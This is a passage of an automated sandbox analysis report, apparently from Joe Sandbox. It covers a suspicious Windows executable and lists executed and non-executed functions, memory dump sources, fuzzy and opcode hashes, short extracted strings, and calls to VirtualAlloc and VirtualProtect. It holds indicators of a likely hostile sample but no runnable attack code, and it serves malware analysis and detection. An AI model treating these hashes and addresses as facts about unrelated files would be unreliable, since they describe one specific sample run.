Opcode ID: fc7d9438146a35a371aa1b4ef1ef8aa3be4601cd8af8e7624d9bbc5028e38aaa
Instruction ID: af3d24b0cb696f60469a8ca9d98ffa70db2286e66c1af94f59b4bc53e336621f
Opcode Fuzzy Hash: fc7d9438146a35a371aa1b4ef1ef8aa3be4601cd8af8e7624d9bbc5028e38aaa
Instruction Fuzzy Hash: 0AE0E631E1555C49DBB5DB10C855AED73B1EF94301F4545F7800EB1595DDB456858F00

Non-executed Functions

Function 00007FFD9BAD09B0 Relevance: 5.2, Strings: 4, Instructions: 177COMMON

Download Yara Rule

Strings

c9, xrefs: 00007FFD9BAD0B56
#{9, xrefs: 00007FFD9BAD0B3E
!k9, xrefs: 00007FFD9BAD0B4E
"s9, xrefs: 00007FFD9BAD0B46

Memory Dump Source

Source File: 00000021.00000002.2268229855.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 3ad6ca470a02edc5dbf6e89e2d1b9a5a9cf7b1698adf691dcccf500648b327b3
Instruction ID: 866344c25eec5b91984ab3e8f40b77c4db09d53cae250371c14d89e5df36be0a
Opcode Fuzzy Hash: 3ad6ca470a02edc5dbf6e89e2d1b9a5a9cf7b1698adf691dcccf500648b327b3
Instruction Fuzzy Hash: 88419E02B0942605E23AB7FD78229F96B449FA937FB4843B7F45E8D0EB4D196086C2D5

Analysis Process: EGjcLJxUTLCptztefbFicvsgXASnZ.exePID: 7860, Parent PID: 5348COMMON

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	7
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFD9BABBD2D Relevance: 1.8, Instructions: 1809
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9babb000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1ae53204bd411762f70f924c9b2c9108efdac13b6f291b69bd80c7d59b1fd1a
Instruction ID: 5bd655ba2fb3c6d36a7cfa9b2380de78cd93f9dc20dd83e83dd4dff19f4ea4e1
Opcode Fuzzy Hash: a1ae53204bd411762f70f924c9b2c9108efdac13b6f291b69bd80c7d59b1fd1a
Instruction Fuzzy Hash: A8F21C71E09A2D8FEBA8DF58C8A5BA8B7B1FB58310F0441F9D01DD7291DA746A81CF40

Function 00007FFD9BB0CB41 Relevance: .6, Instructions: 553COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAFF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baff000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 536b3713ceb85fdbeea9ef610e6aa0c76c780722658de0c45baace0a6cb06bc0
Instruction ID: e3902c115a91734eadcc46affb00aab531b14677be9813874c820c09135665b7
Opcode Fuzzy Hash: 536b3713ceb85fdbeea9ef610e6aa0c76c780722658de0c45baace0a6cb06bc0
Instruction Fuzzy Hash: F0122B71A19A1D8FDBA4DB58C8A5BF8B7A1FB68304F0101EAD04DE3295DF346A80CF40

Function 00007FFD9BAEA4C7 Relevance: .4, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c082f3843d0bc9a3223aa09ab7a4064522f598ad2bb6e1f3055546f3ae95316
Instruction ID: d38d62b908f0e8da08cc9c13acba610d422f1e5313d2dc8ef571844a8361fdff
Opcode Fuzzy Hash: 2c082f3843d0bc9a3223aa09ab7a4064522f598ad2bb6e1f3055546f3ae95316
Instruction Fuzzy Hash: 3E02F770E0421D8FDB18DFA8C4A19EDFBB1FF48304F148569D41AAB25ADB34A985CF54

Function 00007FFD9BAA0D70 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baa0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3c911c33bbd55b92bf0686fb38ed8404a2f30f65983a623edb6d013deb51749
Instruction ID: f34f66efc82588ea1a117985e26e3a6c7e35b9aecc6af3b61c15fdbca7fc600a
Opcode Fuzzy Hash: a3c911c33bbd55b92bf0686fb38ed8404a2f30f65983a623edb6d013deb51749
Instruction Fuzzy Hash: EDA1D071A09A8D8FE798DF68C8A57A97BE1EF99314F0001BAD00DD76D2DB781811CB50

Function 00007FFD9BAF31B5 Relevance: 2.6, Strings: 2, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,, xrefs: 00007FFD9BAF8BE2
4, xrefs: 00007FFD9BAF921C

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: ,$4
API String ID: 0-508195717
Opcode ID: 448a79e663ef6d1f1ecc78f280ef68e0dd0c9766ca50988627e59987ba79c72e
Instruction ID: 3ace888bb674f7174227c4ade0bdb921522cafce9138cd158050f0fbec1f0390
Opcode Fuzzy Hash: 448a79e663ef6d1f1ecc78f280ef68e0dd0c9766ca50988627e59987ba79c72e
Instruction Fuzzy Hash: FA412E70A0964DCFDB64DF54C8A4BE9B7F1EF59310F1141AAC009D72A1DB74AA85CF00

Function 00007FFD9BAF3EC0 Relevance: 1.7, Strings: 1, Instructions: 488
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BAF81EA

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 53606b692a3153d0094817b8993ced8e29e67b48092a7d445c548dec3741ab07
Instruction ID: 90ce65db362dd3ed4800169f0203e389ff2de0b22f2175f4ffee4a02deb66d12
Opcode Fuzzy Hash: 53606b692a3153d0094817b8993ced8e29e67b48092a7d445c548dec3741ab07
Instruction Fuzzy Hash: 9BD1F631B19E4E4FDBA8DB5C98A4AF577E1FF98314B0502BAD40DC72A6DE24ED458340

Function 00007FFD9BAB215E Relevance: 1.7, APIs: 1, Instructions: 192
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32 ref: 00007FFD9BAB229A

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAAB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baab000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a5e1f5290be3bf6a5e90ab962f78431ddc96f6343e1ad74f1f6f7a167a74393c
Instruction ID: a3a8d8865e590d5d3471f2f92529e77cfd9e00168a56ab10e557507077b19d1c
Opcode Fuzzy Hash: a5e1f5290be3bf6a5e90ab962f78431ddc96f6343e1ad74f1f6f7a167a74393c
Instruction Fuzzy Hash: 87517D70D0874D8FDB54DFA8D845AEDBBF1FB6A310F1042AAD048E7256DB74A885CB81

Function 00007FFD9BAFC641 Relevance: 1.6, Strings: 1, Instructions: 371
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

W, xrefs: 00007FFD9BAFC78A

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: a94bd0b571b928e761c05b72308986acf68486621ba920f84703ac3042c7c098
Instruction ID: 9c884d0644dda8cd6aa049bbf463b7fc64cc83149554e75ec31088cb62eee051
Opcode Fuzzy Hash: a94bd0b571b928e761c05b72308986acf68486621ba920f84703ac3042c7c098
Instruction Fuzzy Hash: EEC11732B0EB8D4FDB64DB6998751ED7FE1EF99314F0901BAD088D71A3EE2869018351

Function 00007FFD9BAB3B4D Relevance: 1.5, APIs: 1, Instructions: 212
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 00007FFD9BAB3C6F

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAAB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baab000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bab02022056cf30fb71f95ac44541f2b08040488b88c6d1bbc824a9801636cfd
Instruction ID: 592cba376e88f55dea59d54cdcf2f654ec8b6529310f599bc19ed04e794c805f
Opcode Fuzzy Hash: bab02022056cf30fb71f95ac44541f2b08040488b88c6d1bbc824a9801636cfd
Instruction Fuzzy Hash: F1512930908A1C8FDF94EF98D885BE9BBF1FB69310F1041AAD00DE3255DB71A9858F80

Function 00007FFD9BAFDD61 Relevance: 1.4, Strings: 1, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BAFDE9A

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: c18e8c38ea0816e543874285d69808a0aa474a2635256a320aaaacb8eb73767b
Instruction ID: 00d0b28d3d689191a4b2edc479be3c6bcbcc9340b2b0825428b86b489df31418
Opcode Fuzzy Hash: c18e8c38ea0816e543874285d69808a0aa474a2635256a320aaaacb8eb73767b
Instruction Fuzzy Hash: 32514B31B1EB8E0FEB9ADB6884256B97BE1EF94354B0005FAD05CCB1D6DE28A8048340

Function 00007FFD9BAFD0A1 Relevance: 1.4, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD9BAFD0AC

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: d0a766668755c8245558798448b8989e630a3d5dc65155d10b60872226acca0c
Instruction ID: 423c87b1af38deb5ba08a50a112dd63f548059b5b8f44b4a2c6b9fe4081001b0
Opcode Fuzzy Hash: d0a766668755c8245558798448b8989e630a3d5dc65155d10b60872226acca0c
Instruction Fuzzy Hash: C4410770F1961D8FEBA5DF58C8947A8B7F1FB58310F1101AAD04ED32A1DB746A82CB05

Function 00007FFD9BAFDCBD Relevance: 1.3, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

A, xrefs: 00007FFD9BAFDCCA

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: d3932b0d3d001648d1f7acd64b552761c3594a29e254acebb161d338b8d62d77
Instruction ID: 9e6011293ed5d1b912f182030a75567d3a9099c2d862e98efb5af13a47ab616f
Opcode Fuzzy Hash: d3932b0d3d001648d1f7acd64b552761c3594a29e254acebb161d338b8d62d77
Instruction Fuzzy Hash: C6112622B1EF1E0BDFA8DA5C54682BA6BC1EB98221B0101BFE44DC32A5ED59AC014380

Function 00007FFD9BAFC750 Relevance: 1.3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

W, xrefs: 00007FFD9BAFC78A

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: e210c1d6078d76b323f7f80a8aef11267e7c0eb4f25a77cfb602e3532870d21b
Instruction ID: c2b10477872b1ced0cb470b2ca5450738e25d499293f22aac88f899a8e57bed1
Opcode Fuzzy Hash: e210c1d6078d76b323f7f80a8aef11267e7c0eb4f25a77cfb602e3532870d21b
Instruction Fuzzy Hash: 6F11047161EBC95FE7558769D4202A67FE1EFC5250F0801BFE088C62E7DAADDA058342

Function 00007FFD9BAF6219 Relevance: 1.3, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BAF622A

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 6b0ee83df71f54152e70d322329248de73e68887257b8643930e52a13bd8450e
Instruction ID: 1a3838d8456dcac49b6f7152c5fec1b23c5d37dbccb05f7809e6364e319b60c6
Opcode Fuzzy Hash: 6b0ee83df71f54152e70d322329248de73e68887257b8643930e52a13bd8450e
Instruction Fuzzy Hash: E2115E30918A4D8FCF85EF68C858AE97BF0FF28305F0101AAD458D72A1D734A554CB80

Function 00007FFD9BAF6139 Relevance: 1.3, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BAF614A

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 0b6d0802899723fbf1f88d0d55663cbd8446fd97a12a3da0b81a5ab4932d744e
Instruction ID: 8dd9773d4b4babcbbe5bb6505858c94d0d6b602230966c788fe18a1d62f0943d
Opcode Fuzzy Hash: 0b6d0802899723fbf1f88d0d55663cbd8446fd97a12a3da0b81a5ab4932d744e
Instruction Fuzzy Hash: FD113C30918A8D8FCF85EF68C858AEA7BF0FF29305F0501AAD458D72A1D734A554CB80

Function 00007FFD9BAA4DE8 Relevance: 1.3, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{, xrefs: 00007FFD9BAA4E35

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baa0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: {
API String ID: 0-366298937
Opcode ID: 7158ccc89c808ca02b522afeef4ebbd24e54b1cbf29755d43c1f8cbb99d6fe5f
Instruction ID: b20d4dc71ea2f1dbc4f81d9cc9f972264675fd1b7ee12bb759fad5ab81e147a3
Opcode Fuzzy Hash: 7158ccc89c808ca02b522afeef4ebbd24e54b1cbf29755d43c1f8cbb99d6fe5f
Instruction Fuzzy Hash: 91112830E059698FEB74DB18CC547E9B7B2EB94316F1042E6D40DE22A5EE782E818F44

Function 00007FFD9BAF6CE9 Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BAF6CFA

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 8fbb3d53ba154e55253e7b2d4a2326a9579c94eb5fd2ec224af85f772fe115a4
Instruction ID: 63150d81c31e2e708df19dffdffb29aadd694bbd5f915c9c379b92cbba5a924c
Opcode Fuzzy Hash: 8fbb3d53ba154e55253e7b2d4a2326a9579c94eb5fd2ec224af85f772fe115a4
Instruction Fuzzy Hash: EB012130918A8D8FCF85EF68C858AEA7FF0FF25305F4545AAD418D72A2D7749554CB80

Function 00007FFD9BAE232F Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BAE235D

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bad8000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 5ef36d03762f9e4e93cd322360b7bf47fed2ea251d9bd7e8f597f5c964ae467e
Instruction ID: 63bea8f9e7332da374aea54f4cba77fea6b9753c885bc75ed77654c838ed122e
Opcode Fuzzy Hash: 5ef36d03762f9e4e93cd322360b7bf47fed2ea251d9bd7e8f597f5c964ae467e
Instruction Fuzzy Hash: A90140B0E0561D8FDB64DB84D4947EDB7F1FB68320F1443A6C409E2264CB745A81CF10

Function 00007FFD9BAF4DF9 Relevance: 1.3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9BAF4E0A

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: d86f4bc8cf7b41aa4ce58874a134d1778b061ea4d40775465d097e7e2ca54f70
Instruction ID: 0a119fdc2c713f1d57631e19edb310183b4d903380b8800d7ba5bb02715da474
Opcode Fuzzy Hash: d86f4bc8cf7b41aa4ce58874a134d1778b061ea4d40775465d097e7e2ca54f70
Instruction Fuzzy Hash: DFF0C260A1E78D9FEB61AB6088696E87FA0AF05301F4941FBD44CC60E3DA386244C712

Function 00007FFD9BB0CE40 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAFF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baff000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61632cccae76a4fd916ae316cd95c8b55d8131a52c64b4128a91078df1b449bd
Instruction ID: 4cfef86a392e56b8185f0c553b943db387b6924fd1124113e2dff85f0413813e
Opcode Fuzzy Hash: 61632cccae76a4fd916ae316cd95c8b55d8131a52c64b4128a91078df1b449bd
Instruction Fuzzy Hash: A4C11D71A19A5D8FDBA4DB58C8A57F8B3B1FF68304F0141E9D44DD32A6DE346A808F41

Function 00007FFD9BB0CDFD Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAFF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baff000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c36d9cfc6c6c3f15d702d299844630e3068e3184cb195c5fed21e408d533169
Instruction ID: a2846324b36f0734717fc65e4cc95503ff070c7fc96ffb5078b19de044cb66dc
Opcode Fuzzy Hash: 0c36d9cfc6c6c3f15d702d299844630e3068e3184cb195c5fed21e408d533169
Instruction Fuzzy Hash: 43B10970A19A5D8EDBA4DB58C8A5BF8B3B1FF58304F4141A9D44DE32E6DE346A808F41

Function 00007FFD9BADFC79 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bad8000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb204fc54ae038c4452fdfbafe56b95b4b4cfcd0bf50ffc3ae6323cf9256448c
Instruction ID: ef18b4d1f826dd7f57b189391a1c7ecbb8a1fed260d5f0451aa9562d907f765a
Opcode Fuzzy Hash: bb204fc54ae038c4452fdfbafe56b95b4b4cfcd0bf50ffc3ae6323cf9256448c
Instruction Fuzzy Hash: 2491FA70A0991D8FDBA4EF58C8A4BA977B2FF58304F4041AAD01DD72A6DB35AD85CF40

Function 00007FFD9BAEBD6D Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1d48b3e9c9960dcc317064c1894651c8bfa4470d764d6d5c4f1f00434e39ebe
Instruction ID: f78cd695fd882fdb1fa71ee3cb82ab76539f3c34caf2e6c8f949ba5e435682f8
Opcode Fuzzy Hash: c1d48b3e9c9960dcc317064c1894651c8bfa4470d764d6d5c4f1f00434e39ebe
Instruction Fuzzy Hash: DD51AF30E09A4D8FEB65DB48C8A92E8B7A1FF58310F4541BAD00DD32A1DA746A84CB41

Function 00007FFD9BAB9079 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bab7000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b3b63e19ea2347048a5d28d61c04da9728fd1a1eedb0f5f78cfd755771348ee
Instruction ID: 031e4c92cdecdc4e0951c729cb268430161a9ff9933eff04a1a6a518209addb1
Opcode Fuzzy Hash: 2b3b63e19ea2347048a5d28d61c04da9728fd1a1eedb0f5f78cfd755771348ee
Instruction Fuzzy Hash: 6751A030A09A4D9FCF84EF98D898AED7BF1FF58310F0501A6E419E7261D674E990CB90

Function 00007FFD9BAFD80E Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb5f1f3cdbb317fd931219c87d5711e296cb3cf14ed6236d99492300ab109a22
Instruction ID: 7f924f9d4c51492d04ff46dd0ea4548a57fd26ebc8a159bceadf86d3a0677a63
Opcode Fuzzy Hash: bb5f1f3cdbb317fd931219c87d5711e296cb3cf14ed6236d99492300ab109a22
Instruction Fuzzy Hash: DF315071E09B5D4FDB98DF8C84A97ACBBE2FB68340F04016DD04DE7692DA756840CB40

Function 00007FFD9BABFE50 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9babb000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0570dd1ef334c9ef6af67288e9fae8f4e2f75988833ce1787dfae6ca10b11fed
Instruction ID: 71049d5d31e8b1995467203532d4097c098f2f91b2775942da5b7fe1ca5078d8
Opcode Fuzzy Hash: 0570dd1ef334c9ef6af67288e9fae8f4e2f75988833ce1787dfae6ca10b11fed
Instruction Fuzzy Hash: 7E31346244E3C94FD7138B748CB16E17FB0AF13200F0A46DBD4C48B0E3D2285A1AC722

Function 00007FFD9BAFBB84 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5986d62b20f86704901822d0fa6ca3e99cb2fe3637444613dabc7fddb014fb73
Instruction ID: 20cf1bb8db7f5768d03d01ef12cbf2b7de90c8bd334f20705d4bb208b6a8b49e
Opcode Fuzzy Hash: 5986d62b20f86704901822d0fa6ca3e99cb2fe3637444613dabc7fddb014fb73
Instruction Fuzzy Hash: 9831EE71F0961D8EEBB4DF5489A57E97BB1EB58350F5101B9D00DD32A1DF786A81CB00

Function 00007FFD9BAB8D09 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bab7000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a3762c78dd1e78f049aa4b0db4dcccddfe56cace4cebbae7d5612a7f19e1c6
Instruction ID: 1e3ca780c7f843594b3b3ef79ed25a2bb3f05c919048572fb3eeee5f480069d2
Opcode Fuzzy Hash: 67a3762c78dd1e78f049aa4b0db4dcccddfe56cace4cebbae7d5612a7f19e1c6
Instruction Fuzzy Hash: 3D31BF30A0964D8FCF54DF58C494AED7BF1FF58314F06026AE849E32A1CB34A940CB90

Function 00007FFD9BADB9DD Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bad8000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48e29807efe27e77355f7c21727d10de037bf4fb48efdd1e2416cc267dac6663
Instruction ID: b3534491e753be894bcab41e5ba7ab877e2a958533ebfebaa2fc32e9cb0e3998
Opcode Fuzzy Hash: 48e29807efe27e77355f7c21727d10de037bf4fb48efdd1e2416cc267dac6663
Instruction Fuzzy Hash: 4521A071E0960E8FDB64DF54C8606ED77B1FFA4310F51027AC418DB2A5DA74AA55C7C0

Function 00007FFD9BAA0C25 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

